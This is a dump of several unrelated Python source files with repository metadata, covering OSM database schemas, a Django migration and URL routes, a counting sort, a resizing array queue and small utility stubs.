self.movie_features,
tag_ids,
direction=direction,
relu=False,
)
critique_fit = np.multiply(critique_d, distances)
orderings = np.argsort(critique_fit, axis=-1)[:, ::-1]
minimum = np.zeros(length, dtype=int)
for k, dist in enumerate(critique_fit):
quartile = np.percentile(dist, [0, 5])
last = np.where(
np.logical_and((dist >= quartile[0]), (dist <= quartile[1]))
)[0]
if i in last:
index = np.where(last == i)[0][0]
last = np.delete(last, index)
minimum[k] = random_state.choice(last, size=1)[0]
orderings = orderings[:, 0 : n_objects - 2]
orderings = np.append(orderings, minimum[:, None], axis=1)
orderings = np.append(
orderings, np.zeros(length, dtype=int)[:, None] + i, axis=1
)
for o in orderings:
random_state.shuffle(o)
scores.extend(critique_fit[np.arange(length)[:, None], orderings])
X.extend(self.movie_features[orderings])
X = np.array(X)
scores = np.array(scores)
indices = random_state.choice(X.shape[0], n_instances, replace=False)
X = X[indices, :, :]
scores = scores[indices, :]
Y = scores.argmin(axis=1)
Y = convert_to_label_encoding(Y, n_objects)
return X, Y
return dataset_generator
| 42.62585 | 111 | 0.57804 | 5,873 | 0.937281 | 0 | 0 | 0 | 0 | 0 | 0 | 527 | 0.084105 |
7b6453cb804d74096b8a1f23797b8a9e957ae61c | 12,614 | py | Python | tests/conversion/converters/inside_worker_test/declarative_schema/osm_models.py | tyrasd/osmaxx | da4454083d17b2ef8b0623cad62e39992b6bd52a | [
"MIT"
]
| 27 | 2015-03-30T14:17:26.000Z | 2022-02-19T17:30:44.000Z | tests/conversion/converters/inside_worker_test/declarative_schema/osm_models.py | tyrasd/osmaxx | da4454083d17b2ef8b0623cad62e39992b6bd52a | [
"MIT"
]
| 483 | 2015-03-09T16:58:03.000Z | 2022-03-14T09:29:06.000Z | tests/conversion/converters/inside_worker_test/declarative_schema/osm_models.py | tyrasd/osmaxx | da4454083d17b2ef8b0623cad62e39992b6bd52a | [
"MIT"
]
| 6 | 2015-04-07T07:38:30.000Z | 2020-04-01T12:45:53.000Z | # coding: utf-8
from geoalchemy2 import Geometry
from sqlalchemy import BigInteger, Column, DateTime, Float, Integer, SmallInteger, Table, Text, TEXT, BIGINT
from sqlalchemy.dialects.postgresql import HSTORE
from sqlalchemy.dialects.postgresql import ARRAY
from sqlalchemy.ext.declarative import declarative_base
Base = declarative_base()
metadata = Base.metadata
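# Note: SRID 900913 used below is the legacy, unofficial "Google Web Mercator"
# code, equivalent to EPSG:3857.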
t_osm_line = Table(
'osm_line', metadata,
Column('osm_id', BigInteger, index=True),
Column('access', Text),
Column('addr:city', Text),
Column('addr:housenumber', Text),
Column('addr:interpolation', Text),
Column('addr:place', Text),
Column('addr:postcode', Text),
Column('addr:street', Text),
Column('addr:country', Text),
Column('admin_level', Text),
Column('aerialway', Text),
Column('aeroway', Text),
Column('amenity', Text),
Column('area', Text),
Column('barrier', Text),
Column('brand', Text),
Column('bridge', Text),
Column('boundary', Text),
Column('building', Text),
Column('bus', Text),
Column('contact:phone', Text),
Column('cuisine', Text),
Column('denomination', Text),
Column('drinkable', Text),
Column('emergency', Text),
Column('entrance', Text),
Column('foot', Text),
Column('frequency', Text),
Column('generator:source', Text),
Column('height', Text),
Column('highway', Text),
Column('historic', Text),
Column('information', Text),
Column('junction', Text),
Column('landuse', Text),
Column('layer', Text),
Column('leisure', Text),
Column('man_made', Text),
Column('maxspeed', Text),
Column('military', Text),
Column('name', Text),
Column('int_name', Text),
Column('name:en', Text),
Column('name:de', Text),
Column('name:fr', Text),
Column('name:es', Text),
Column('natural', Text),
Column('office', Text),
Column('oneway', Text),
Column('opening_hours', Text),
Column('operator', Text),
Column('phone', Text),
Column('power', Text),
Column('power_source', Text),
Column('parking', Text),
Column('place', Text),
Column('population', Text),
Column('public_transport', Text),
Column('recycling:glass', Text),
Column('recycling:paper', Text),
Column('recycling:clothes', Text),
Column('recycling:scrap_metal', Text),
Column('railway', Text),
Column('ref', Text),
Column('religion', Text),
Column('route', Text),
Column('service', Text),
Column('shop', Text),
Column('sport', Text),
Column('tourism', Text),
Column('tower:type', Text),
Column('tracktype', Text),
Column('traffic_calming', Text),
Column('train', Text),
Column('tram', Text),
Column('tunnel', Text),
Column('type', Text),
Column('vending', Text),
Column('voltage', Text),
Column('water', Text),
Column('waterway', Text),
Column('website', Text),
Column('wetland', Text),
Column('width', Text),
Column('wikipedia', Text),
Column('z_order', SmallInteger),
Column('way_area', Float),
Column('osm_timestamp', DateTime),
Column('osm_version', Text),
Column('tags', HSTORE),
Column('way', Geometry(geometry_type='LineString', srid=900913), index=True)
)
class OsmNode(Base):
__tablename__ = 'osm_nodes'
id = Column(BigInteger, primary_key=True)
lat = Column(Integer, nullable=False)
lon = Column(Integer, nullable=False)
tags = Column(ARRAY(TEXT()))
t_osm_point = Table(
'osm_point', metadata,
Column('osm_id', BigInteger, index=True),
Column('access', Text),
Column('addr:city', Text),
Column('addr:housenumber', Text),
Column('addr:interpolation', Text),
Column('addr:place', Text),
Column('addr:postcode', Text),
Column('addr:street', Text),
Column('addr:country', Text),
Column('admin_level', Text),
Column('aerialway', Text),
Column('aeroway', Text),
Column('amenity', Text),
Column('area', Text),
Column('barrier', Text),
Column('brand', Text),
Column('bridge', Text),
Column('boundary', Text),
Column('building', Text),
Column('bus', Text),
Column('contact:phone', Text),
Column('cuisine', Text),
Column('denomination', Text),
Column('drinkable', Text),
Column('ele', Text),
Column('emergency', Text),
Column('entrance', Text),
Column('foot', Text),
Column('frequency', Text),
Column('generator:source', Text),
Column('height', Text),
Column('highway', Text),
Column('historic', Text),
Column('information', Text),
Column('junction', Text),
Column('landuse', Text),
Column('layer', Text),
Column('leisure', Text),
Column('man_made', Text),
Column('maxspeed', Text),
Column('military', Text),
Column('name', Text),
Column('int_name', Text),
Column('name:en', Text),
Column('name:de', Text),
Column('name:fr', Text),
Column('name:es', Text),
Column('natural', Text),
Column('office', Text),
Column('oneway', Text),
Column('opening_hours', Text),
Column('operator', Text),
Column('phone', Text),
Column('power', Text),
Column('power_source', Text),
Column('parking', Text),
Column('place', Text),
Column('population', Text),
Column('public_transport', Text),
Column('recycling:glass', Text),
Column('recycling:paper', Text),
Column('recycling:clothes', Text),
Column('recycling:scrap_metal', Text),
Column('railway', Text),
Column('ref', Text),
Column('religion', Text),
Column('route', Text),
Column('service', Text),
Column('shop', Text),
Column('sport', Text),
Column('tourism', Text),
Column('tower:type', Text),
Column('traffic_calming', Text),
Column('train', Text),
Column('tram', Text),
Column('tunnel', Text),
Column('type', Text),
Column('vending', Text),
Column('voltage', Text),
Column('water', Text),
Column('waterway', Text),
Column('website', Text),
Column('wetland', Text),
Column('width', Text),
Column('wikipedia', Text),
Column('z_order', SmallInteger),
Column('osm_timestamp', DateTime),
Column('osm_version', Text),
Column('tags', HSTORE),
Column('way', Geometry(geometry_type='Point', srid=900913), index=True)
)
t_osm_polygon = Table(
'osm_polygon', metadata,
Column('osm_id', BigInteger, index=True),
Column('access', Text),
Column('addr:city', Text),
Column('addr:housenumber', Text),
Column('addr:interpolation', Text),
Column('addr:place', Text),
Column('addr:postcode', Text),
Column('addr:street', Text),
Column('addr:country', Text),
Column('admin_level', Text),
Column('aerialway', Text),
Column('aeroway', Text),
Column('amenity', Text),
Column('area', Text),
Column('barrier', Text),
Column('brand', Text),
Column('bridge', Text),
Column('boundary', Text),
Column('building', Text),
Column('bus', Text),
Column('contact:phone', Text),
Column('cuisine', Text),
Column('denomination', Text),
Column('drinkable', Text),
Column('emergency', Text),
Column('entrance', Text),
Column('foot', Text),
Column('frequency', Text),
Column('generator:source', Text),
Column('height', Text),
Column('highway', Text),
Column('historic', Text),
Column('information', Text),
Column('junction', Text),
Column('landuse', Text),
Column('layer', Text),
Column('leisure', Text),
Column('man_made', Text),
Column('maxspeed', Text),
Column('military', Text),
Column('name', Text),
Column('int_name', Text),
Column('name:en', Text),
Column('name:de', Text),
Column('name:fr', Text),
Column('name:es', Text),
Column('natural', Text),
Column('office', Text),
Column('oneway', Text),
Column('opening_hours', Text),
Column('operator', Text),
Column('phone', Text),
Column('power', Text),
Column('power_source', Text),
Column('parking', Text),
Column('place', Text),
Column('population', Text),
Column('public_transport', Text),
Column('recycling:glass', Text),
Column('recycling:paper', Text),
Column('recycling:clothes', Text),
Column('recycling:scrap_metal', Text),
Column('railway', Text),
Column('ref', Text),
Column('religion', Text),
Column('route', Text),
Column('service', Text),
Column('shop', Text),
Column('sport', Text),
Column('tourism', Text),
Column('tower:type', Text),
Column('tracktype', Text),
Column('traffic_calming', Text),
Column('train', Text),
Column('tram', Text),
Column('tunnel', Text),
Column('type', Text),
Column('vending', Text),
Column('voltage', Text),
Column('water', Text),
Column('waterway', Text),
Column('website', Text),
Column('wetland', Text),
Column('width', Text),
Column('wikipedia', Text),
Column('z_order', SmallInteger),
Column('way_area', Float),
Column('osm_timestamp', DateTime),
Column('osm_version', Text),
Column('tags', HSTORE),
Column('way', Geometry(geometry_type='Geometry', srid=900913), index=True)
)
class OsmRel(Base):
__tablename__ = 'osm_rels'
id = Column(BigInteger, primary_key=True)
way_off = Column(SmallInteger)
rel_off = Column(SmallInteger)
parts = Column(ARRAY(BIGINT()), index=True)
members = Column(ARRAY(TEXT()))
tags = Column(ARRAY(TEXT()))
t_osm_roads = Table(
'osm_roads', metadata,
Column('osm_id', BigInteger, index=True),
Column('access', Text),
Column('addr:city', Text),
Column('addr:housenumber', Text),
Column('addr:interpolation', Text),
Column('addr:place', Text),
Column('addr:postcode', Text),
Column('addr:street', Text),
Column('addr:country', Text),
Column('admin_level', Text),
Column('aerialway', Text),
Column('aeroway', Text),
Column('amenity', Text),
Column('area', Text),
Column('barrier', Text),
Column('brand', Text),
Column('bridge', Text),
Column('boundary', Text),
Column('building', Text),
Column('bus', Text),
Column('contact:phone', Text),
Column('cuisine', Text),
Column('denomination', Text),
Column('drinkable', Text),
Column('emergency', Text),
Column('entrance', Text),
Column('foot', Text),
Column('frequency', Text),
Column('generator:source', Text),
Column('height', Text),
Column('highway', Text),
Column('historic', Text),
Column('information', Text),
Column('junction', Text),
Column('landuse', Text),
Column('layer', Text),
Column('leisure', Text),
Column('man_made', Text),
Column('maxspeed', Text),
Column('military', Text),
Column('name', Text),
Column('int_name', Text),
Column('name:en', Text),
Column('name:de', Text),
Column('name:fr', Text),
Column('name:es', Text),
Column('natural', Text),
Column('office', Text),
Column('oneway', Text),
Column('opening_hours', Text),
Column('operator', Text),
Column('phone', Text),
Column('power', Text),
Column('power_source', Text),
Column('parking', Text),
Column('place', Text),
Column('population', Text),
Column('public_transport', Text),
Column('recycling:glass', Text),
Column('recycling:paper', Text),
Column('recycling:clothes', Text),
Column('recycling:scrap_metal', Text),
Column('railway', Text),
Column('ref', Text),
Column('religion', Text),
Column('route', Text),
Column('service', Text),
Column('shop', Text),
Column('sport', Text),
Column('tourism', Text),
Column('tower:type', Text),
Column('tracktype', Text),
Column('traffic_calming', Text),
Column('train', Text),
Column('tram', Text),
Column('tunnel', Text),
Column('type', Text),
Column('vending', Text),
Column('voltage', Text),
Column('water', Text),
Column('waterway', Text),
Column('website', Text),
Column('wetland', Text),
Column('width', Text),
Column('wikipedia', Text),
Column('z_order', SmallInteger),
Column('way_area', Float),
Column('osm_timestamp', DateTime),
Column('osm_version', Text),
Column('tags', HSTORE),
Column('way', Geometry(geometry_type='LineString', srid=900913), index=True)
)
class OsmWay(Base):
__tablename__ = 'osm_ways'
id = Column(BigInteger, primary_key=True)
nodes = Column(ARRAY(BIGINT()), nullable=False, index=True)
tags = Column(ARRAY(TEXT()))
| 29.961995 | 108 | 0.615507 | 694 | 0.055018 | 0 | 0 | 0 | 0 | 0 | 0 | 3,860 | 0.306009 |
7b64b4f449f372c3bd3efce8e5b293075f2e5515 | 321 | py | Python | twinfield/tests/__init__.py | yellowstacks/twinfield | 2ae161a6cf6d7ff1f2c80a034b775f3d4928313d | [
"Apache-2.0"
]
| 4 | 2020-12-20T23:02:33.000Z | 2022-01-13T19:40:13.000Z | twinfield/tests/__init__.py | yellowstacks/twinfield | 2ae161a6cf6d7ff1f2c80a034b775f3d4928313d | [
"Apache-2.0"
]
| 9 | 2020-12-18T07:27:07.000Z | 2022-02-17T09:23:51.000Z | twinfield/tests/__init__.py | yellowstacks/twinfield | 2ae161a6cf6d7ff1f2c80a034b775f3d4928313d | [
"Apache-2.0"
]
| null | null | null | import logging
from keyvault import secrets_to_environment
from twinfield import TwinfieldApi
logging.basicConfig(
format="%(asctime)s.%(msecs)03d [%(levelname)-5s] [%(name)s] - %(message)s",
datefmt="%Y-%m-%d %H:%M:%S",
level=logging.INFO,
)
secrets_to_environment("twinfield-test")
tw = TwinfieldApi()
| 20.0625 | 80 | 0.70405 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 103 | 0.320872 |
7b64b79a9fe2fe03f8066b0d29de8f2b6617fac5 | 397 | py | Python | magic/magicdb/migrations/0002_auto_20181027_1726.py | ParserKnight/django-app-magic | bdedf7f423da558f09d5818157762f3d8ac65d93 | [
"MIT"
]
| 1 | 2019-12-20T17:56:13.000Z | 2019-12-20T17:56:13.000Z | magic/magicdb/migrations/0002_auto_20181027_1726.py | ParserKnight/django-app-magic | bdedf7f423da558f09d5818157762f3d8ac65d93 | [
"MIT"
]
| 11 | 2019-11-23T19:24:17.000Z | 2022-03-11T23:34:21.000Z | magic/magicdb/migrations/0002_auto_20181027_1726.py | ParserKnight/django-app-magic | bdedf7f423da558f09d5818157762f3d8ac65d93 | [
"MIT"
]
| 1 | 2019-12-20T17:58:20.000Z | 2019-12-20T17:58:20.000Z | # Generated by Django 2.1.2 on 2018-10-27 17:26
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('magicdb', '0001_initial'),
]
operations = [
migrations.AlterField(
model_name='card',
name='number',
field=models.IntegerField(blank=True, null=True, unique=True),
),
]
| 20.894737 | 74 | 0.594458 | 304 | 0.765743 | 0 | 0 | 0 | 0 | 0 | 0 | 84 | 0.211587 |
7b6531b31b1e432174690734541236e12b96ec5b | 385 | py | Python | dscli/storageimage.py | Taywee/dscli-python | c06786d3924912b323251d8e081edf60d3cedef0 | [
"MIT"
]
| null | null | null | dscli/storageimage.py | Taywee/dscli-python | c06786d3924912b323251d8e081edf60d3cedef0 | [
"MIT"
]
| null | null | null | dscli/storageimage.py | Taywee/dscli-python | c06786d3924912b323251d8e081edf60d3cedef0 | [
"MIT"
]
| null | null | null | # -*- coding: utf-8 -*-
# Copyright © 2017 Taylor C. Richberger <[email protected]>
# This code is released under the license described in the LICENSE file
from __future__ import division, absolute_import, print_function, unicode_literals
# NOTE: the original class body was not valid Python; the attribute <- XML
# field mapping below is reconstructed from the stub. `Instance` is assumed
# to be a base class defined elsewhere in the dscli package, and `xml` is
# assumed to expose a dict-like get().
class StorageImage(Instance):
    def __init__(self, xml):
        self.name = xml.get('sfi_name')
        self.id = xml.get('ess_id')
        self.storagesystem = xml.get('sf_id')
        self.model = xml.get('model')
| 29.615385 | 82 | 0.711688 | 146 | 0.378238 | 0 | 0 | 0 | 0 | 0 | 0 | 151 | 0.391192 |
7b654b9c9b8b039ce736b77aa128a506d29b9452 | 140 | py | Python | Pruebas/prob_14.py | FR98/Cuarto-Compu | 3824d0089562bccfbc839d9979809bc7a0fe4684 | [
"MIT"
]
| 1 | 2022-03-20T12:57:04.000Z | 2022-03-20T12:57:04.000Z | Pruebas/prob_14.py | FR98/cuarto-compu | 3824d0089562bccfbc839d9979809bc7a0fe4684 | [
"MIT"
]
| null | null | null | Pruebas/prob_14.py | FR98/cuarto-compu | 3824d0089562bccfbc839d9979809bc7a0fe4684 | [
"MIT"
]
| null | null | null | def prob_14(n):
if n < 2:
return False
for i in range(2, n):
if n % i == 0:
return False
return True | 20 | 25 | 0.464286 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 |
7b65bb70b1e3c95b7c5e5cfddb6056ef4399ec89 | 2,968 | py | Python | crnpy/utils.py | mehradans92/crnpy | e145d63b5cf97eb3c91276000cc8fef92c35cde9 | [
"BSD-3-Clause"
]
| null | null | null | crnpy/utils.py | mehradans92/crnpy | e145d63b5cf97eb3c91276000cc8fef92c35cde9 | [
"BSD-3-Clause"
]
| null | null | null | crnpy/utils.py | mehradans92/crnpy | e145d63b5cf97eb3c91276000cc8fef92c35cde9 | [
"BSD-3-Clause"
]
| null | null | null | import numpy as np
import matplotlib.pyplot as plt
def weighted_quantile(values, quantiles, sample_weight=None,
values_sorted=False, old_style=False):
''' Very close to numpy.percentile, but supports weights.
Note: quantiles should be in [0, 1]!
:param values: numpy.array with data
:param quantiles: array-like with many quantiles needed
    :param sample_weight: array-like of the same length as `values`
:param values_sorted: bool, if True, then will avoid sorting of
initial array
:param old_style: if True, will correct output to be consistent
with numpy.percentile.
:return: numpy.array with computed quantiles.
'''
values = np.array(values)
quantiles = np.array(quantiles)
if sample_weight is None:
sample_weight = np.ones(len(values))
sample_weight = np.array(sample_weight)
assert np.all(quantiles >= 0) and np.all(quantiles <= 1), \
'quantiles should be in [0, 1]'
if not values_sorted:
sorter = np.argsort(values)
values = values[sorter]
sample_weight = sample_weight[sorter]
weighted_quantiles = np.cumsum(sample_weight) - 0.5 * sample_weight
if old_style:
# To be convenient with numpy.percentile
weighted_quantiles -= weighted_quantiles[0]
weighted_quantiles /= weighted_quantiles[-1]
else:
weighted_quantiles /= np.sum(sample_weight)
return np.interp(quantiles, weighted_quantiles, values)
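# Illustrative example: with values [1, 2, 3] and weights [1, 1, 4], the
# weighted median interpolates between 2 and 3:
#   weighted_quantile([1, 2, 3], [0.5], sample_weight=[1, 1, 4])  # -> array([2.6])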
def plot_samples(trajs, t, ref_traj=None, lower_q_bound=1/3, upper_q_bound=2/3, alpha=0.2, restraints=None, weights=None, crn=None, sim_incr=0.001):
if weights is None:
w = np.ones(trajs.shape[0])
else:
w = weights
w /= np.sum(w)
x = range(trajs.shape[1])
qtrajs = np.apply_along_axis(lambda x: weighted_quantile(
x, [lower_q_bound, 1/2, upper_q_bound], sample_weight=w), 0, trajs)
mtrajs = np.sum(trajs * w[:, np.newaxis, np.newaxis], axis=0)
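    # Re-center the lower/upper quantile bands around the weighted mean;
    # the median band itself is replaced by the mean below.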
qtrajs[0, :, :] = qtrajs[0, :, :] - qtrajs[1, :, :] + mtrajs
qtrajs[2, :, :] = qtrajs[2, :, :] - qtrajs[1, :, :] + mtrajs
qtrajs[1, :, :] = mtrajs
fig, ax = plt.subplots(dpi=100)
for i in range(trajs.shape[-1]):
ax.plot(t, qtrajs[1, :, i], color=f'C{i}', label=crn.species[i])
ax.fill_between(t, qtrajs[0, :, i],
qtrajs[2, :, i], color=f'C{i}', alpha=alpha)
if ref_traj is not None:
ax.plot(t, ref_traj[:, i], '--',
color=f'C{i}', label=crn.species[i])
ax.set_xlabel('Time (s)')
ax.set_ylabel('Species concentration')
handles, labels = ax.get_legend_handles_labels()
unique = [(h, l) for i, (h, l) in enumerate(
zip(handles, labels)) if l not in labels[:i]]
ax.legend(*zip(*unique), loc='upper left', bbox_to_anchor=(1.1, 0.9))
if restraints is not None:
for r in restraints:
ax.plot(r[2]*sim_incr, r[0], marker='o', color='k')
| 41.802817 | 148 | 0.626685 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 664 | 0.22372 |
7b65f6a1d2bed41aa57a027424c81ab5587c97d9 | 123 | py | Python | exercise/newfile5.py | LeeBeral/python | 9f0d360d69ee5245e3ef13a9dc9fc666374587a4 | [
"MIT"
]
| null | null | null | exercise/newfile5.py | LeeBeral/python | 9f0d360d69ee5245e3ef13a9dc9fc666374587a4 | [
"MIT"
]
| null | null | null | exercise/newfile5.py | LeeBeral/python | 9f0d360d69ee5245e3ef13a9dc9fc666374587a4 | [
"MIT"
]
| null | null | null | alist = [1,2,3,5,5,1,3]
b = set(alist)
c = tuple(alist)
print(b)
print(c)
print([x for x in b])
print([x for x in c]) | 17.571429 | 24 | 0.569106 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 |
7b661c16cd5afafef4aba119027c917f67774a50 | 170 | py | Python | ocp_resources/kubevirt_metrics_aggregation.py | kbidarkar/openshift-python-wrapper | 3cd4d6d3b71c82ff87f032a51510d9c9d207f6cb | [
"Apache-2.0"
]
| 9 | 2021-07-05T18:35:55.000Z | 2021-12-31T03:09:39.000Z | ocp_resources/kubevirt_metrics_aggregation.py | kbidarkar/openshift-python-wrapper | 3cd4d6d3b71c82ff87f032a51510d9c9d207f6cb | [
"Apache-2.0"
]
| 418 | 2021-07-04T13:12:09.000Z | 2022-03-30T08:37:45.000Z | ocp_resources/kubevirt_metrics_aggregation.py | kbidarkar/openshift-python-wrapper | 3cd4d6d3b71c82ff87f032a51510d9c9d207f6cb | [
"Apache-2.0"
]
| 28 | 2021-07-04T12:48:18.000Z | 2022-02-22T15:19:30.000Z | from ocp_resources.resource import NamespacedResource
class KubevirtMetricsAggregation(NamespacedResource):
api_group = NamespacedResource.ApiGroup.SSP_KUBEVIRT_IO
| 28.333333 | 59 | 0.870588 | 113 | 0.664706 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 |
7b66b53434936973c793021141732d4d9ee0ccb9 | 1,329 | py | Python | metashare/accounts/urls.py | hpusset/ELRI | c4455cff3adb920627f014f37e740665342e9cee | [
"BSD-3-Clause"
]
| 1 | 2017-07-10T08:15:07.000Z | 2017-07-10T08:15:07.000Z | metashare/accounts/urls.py | hpusset/ELRI | c4455cff3adb920627f014f37e740665342e9cee | [
"BSD-3-Clause"
]
| null | null | null | metashare/accounts/urls.py | hpusset/ELRI | c4455cff3adb920627f014f37e740665342e9cee | [
"BSD-3-Clause"
]
| 1 | 2018-07-03T07:55:56.000Z | 2018-07-03T07:55:56.000Z | from django.conf.urls import patterns, url
from metashare.settings import DJANGO_BASE
urlpatterns = patterns('metashare.accounts.views',
url(r'create/$',
'create', name='create'),
url(r'confirm/(?P<uuid>[0-9a-f]{32})/$',
'confirm', name='confirm'),
url(r'contact/$',
'contact', name='contact'),
url(r'reset/(?:(?P<uuid>[0-9a-f]{32})/)?$',
'reset', name='reset'),
url(r'profile/$',
'edit_profile', name='edit_profile'),
url(r'editor_group_application/$',
'editor_group_application', name='editor_group_application'),
url(r'organization_application/$',
'organization_application', name='organization_application'),
url(r'update_default_editor_groups/$',
'update_default_editor_groups', name='update_default_editor_groups'),
url(r'edelivery_membership_application/$',
'edelivery_application', name='edelivery_application'),
)
urlpatterns += patterns('django.contrib.auth.views',
url(r'^profile/change_password/$', 'password_change',
{'post_change_redirect' : '/{0}accounts/profile/change_password/done/'.format(DJANGO_BASE), 'template_name': 'accounts/change_password.html'}, name='password_change'),
url(r'^profile/change_password/done/$', 'password_change_done',
{'template_name': 'accounts/change_password_done.html'}, name='password_change_done'),
)
| 42.870968 | 175 | 0.713318 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 897 | 0.674944 |
7b690221ede88220da58423f3771708cee9c615d | 4,090 | py | Python | lib_collection/queue/resizing_array_queue.py | caser789/libcollection | eb0a6fc36ce1cb57ed587865bbc1576e81c08924 | [
"MIT"
]
| null | null | null | lib_collection/queue/resizing_array_queue.py | caser789/libcollection | eb0a6fc36ce1cb57ed587865bbc1576e81c08924 | [
"MIT"
]
| null | null | null | lib_collection/queue/resizing_array_queue.py | caser789/libcollection | eb0a6fc36ce1cb57ed587865bbc1576e81c08924 | [
"MIT"
]
| null | null | null | class ResizingArrayQueue(object):
def __init__(self, lst=None, capacity=2):
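        # Invariants: `n` elements live in `lst` starting at index `head`
        # (wrapping around the end); `tail` is the next write position.
        # Note that the `lst` parameter is accepted but not used here.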
self.capacity = capacity
self.lst = [None] * self.capacity
self.head = 0
self.tail = 0
self.n = 0
def __len__(self):
"""
>>> queue = ResizingArrayQueue()
>>> len(queue)
0
>>> queue.enqueue('a')
>>> len(queue)
1
>>> queue.enqueue('b')
>>> len(queue)
2
"""
return self.n
def __contains__(self, i):
"""
>>> queue = ResizingArrayQueue()
>>> 'a' in queue
False
>>> queue.enqueue('a')
>>> queue.enqueue('b')
>>> 'a' in queue
True
"""
for j in self:
if j == i:
return True
return False
def __iter__(self):
"""
>>> queue = ResizingArrayQueue()
>>> queue.enqueue('a')
>>> queue.enqueue('b')
>>> for i in queue:
... print i
...
a
b
"""
n = self.head
for _ in range(len(self)):
if n == self.capacity:
n = 0
yield self.lst[n]
n += 1
def __repr__(self):
"""
>>> queue = ResizingArrayQueue()
>>> queue.enqueue('a')
>>> queue.enqueue('b')
>>> queue
ResizingArrayQueue(['a', 'b'])
>>> print queue
ResizingArrayQueue(['a', 'b'])
"""
return 'ResizingArrayQueue([{}])'.format(', '.join(repr(i) for i in self))
def enqueue(self, i):
"""
>>> queue = ResizingArrayQueue()
>>> queue.enqueue('a')
>>> queue.enqueue('b')
>>> queue.enqueue('c')
>>> queue
ResizingArrayQueue(['a', 'b', 'c'])
>>> queue.capacity
4
"""
if len(self) == self.capacity:
self._resize(self.capacity*2)
if self.tail == self.capacity:
self.tail = 0
self.lst[self.tail] = i
self.tail += 1
self.n += 1
def dequeue(self):
"""
>>> queue = ResizingArrayQueue()
>>> queue.dequeue()
Traceback (most recent call last):
...
IndexError: dequeue from empty queue
>>> queue.enqueue('a')
>>> queue.enqueue('b')
>>> queue.enqueue('c')
>>> queue.dequeue()
'a'
>>> queue.dequeue()
'b'
>>> queue.enqueue('d')
>>> queue.enqueue('e')
>>> queue.enqueue('f')
>>> queue.lst
['e', 'f', 'c', 'd']
>>> queue.enqueue('g')
>>> queue.capacity
8
>>> queue.dequeue()
'c'
>>> queue.dequeue()
'd'
>>> queue.dequeue()
'e'
>>> queue.dequeue()
'f'
>>> queue.capacity
4
>>> queue.dequeue()
'g'
>>> queue.capacity
2
"""
if len(self) == 0:
raise IndexError('dequeue from empty queue')
if len(self) * 4 <= self.capacity:
self._resize(self.capacity/2)
if self.head == self.capacity:
self.head = 0
res = self.lst[self.head]
self.head += 1
self.n -= 1
return res
@property
def top(self):
"""
>>> queue = ResizingArrayQueue()
>>> queue.top
Traceback (most recent call last):
...
IndexError: top from empty queue
>>> queue.enqueue('a')
>>> queue.top
'a'
>>> queue.enqueue('b')
>>> queue.top
'a'
>>> queue.dequeue()
'a'
>>> queue.top
'b'
"""
if len(self) == 0:
raise IndexError('top from empty queue')
return self.lst[self.head]
def _resize(self, n):
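        # Copy every element into a fresh queue of the requested capacity;
        # this also normalizes the layout so that head == 0 afterwards.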
q = ResizingArrayQueue(capacity=n)
for e in self:
q.enqueue(e)
self.capacity = q.capacity
self.lst = q.lst
self.head = q.head
self.tail = q.tail
self.n = q.n
| 23.505747 | 82 | 0.429829 | 4,089 | 0.999756 | 393 | 0.096088 | 534 | 0.130562 | 0 | 0 | 2,407 | 0.588509 |
7b6919cc089619a865a91ca1a0c07ade430d6d28 | 366 | py | Python | conduit/config/env/__init__.py | utilmeta/utilmeta-py-realworld-example-app | cf6d9e83e72323a830b2fcdb5c5eae3ebd800103 | [
"MIT"
]
| null | null | null | conduit/config/env/__init__.py | utilmeta/utilmeta-py-realworld-example-app | cf6d9e83e72323a830b2fcdb5c5eae3ebd800103 | [
"MIT"
]
| null | null | null | conduit/config/env/__init__.py | utilmeta/utilmeta-py-realworld-example-app | cf6d9e83e72323a830b2fcdb5c5eae3ebd800103 | [
"MIT"
]
| null | null | null | from utilmeta.conf import Env
class ServiceEnvironment(Env):
PRODUCTION: bool = False
OPS_TOKEN: str = ''
JWT_SECRET_key: str = ''
DATABASE_USER: str = ''
DATABASE_PASSWORD: str = ''
REDIS_PASSWORD: str = ''
PUBLIC_ONLY: bool = True
TEST_ENV_SUFFIX: str = '' # be -test when it's test env
env = ServiceEnvironment(__file__)
| 22.875 | 65 | 0.650273 | 296 | 0.808743 | 0 | 0 | 0 | 0 | 0 | 0 | 41 | 0.112022 |
7b6a1e3587e95d7c0cf5eb9e41ba34ccfca2c19e | 437 | py | Python | sort/counting.py | haandol/dojo | c29dc54614bdfaf79eb4862ed9fa25974a0f5654 | [
"MIT"
]
| null | null | null | sort/counting.py | haandol/dojo | c29dc54614bdfaf79eb4862ed9fa25974a0f5654 | [
"MIT"
]
| null | null | null | sort/counting.py | haandol/dojo | c29dc54614bdfaf79eb4862ed9fa25974a0f5654 | [
"MIT"
]
| null | null | null | # https://www.geeksforgeeks.org/counting-sort/
def sort(arr):
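    # Three phases: (1) histogram the values, (2) prefix-sum so counts[v]
    # becomes the number of elements <= v, (3) place each element at its
    # final index counts[arr[i]] - 1. Assumes non-negative integers;
    # runs in O(n + max(arr)) time.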
n = len(arr)
result = [-1] * n
counts = [0] * (max(arr) + 1)
for el in arr:
counts[el] += 1
for i in range(1, len(counts)):
counts[i] += counts[i-1]
for i in range(n):
result[counts[arr[i]] - 1] = arr[i]
counts[arr[i]] -= 1
return result
if __name__ == '__main__':
arr = [10, 7, 8, 9, 1, 5]
assert [1, 5, 7, 8, 9, 10] == sort(arr)
| 18.208333 | 46 | 0.535469 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 56 | 0.128146 |
7b6a67db77e30e9f797bb8f8a046460eef6c1f54 | 1,316 | py | Python | uedinst/daq.py | trbritt/uedinst | e9fe1379b762be97b31ffab86a2cb149cb6291da | [
"BSD-3-Clause"
]
| null | null | null | uedinst/daq.py | trbritt/uedinst | e9fe1379b762be97b31ffab86a2cb149cb6291da | [
"BSD-3-Clause"
]
| null | null | null | uedinst/daq.py | trbritt/uedinst | e9fe1379b762be97b31ffab86a2cb149cb6291da | [
"BSD-3-Clause"
]
| null | null | null | import nidaqmx
from . import InstrumentException
from time import sleep
class PCI6281:
"""
    Interface to the National Instruments data acquisition (DAQ) card PCI-6281.
"""
def __init__(self, *args, **kwargs):
pass
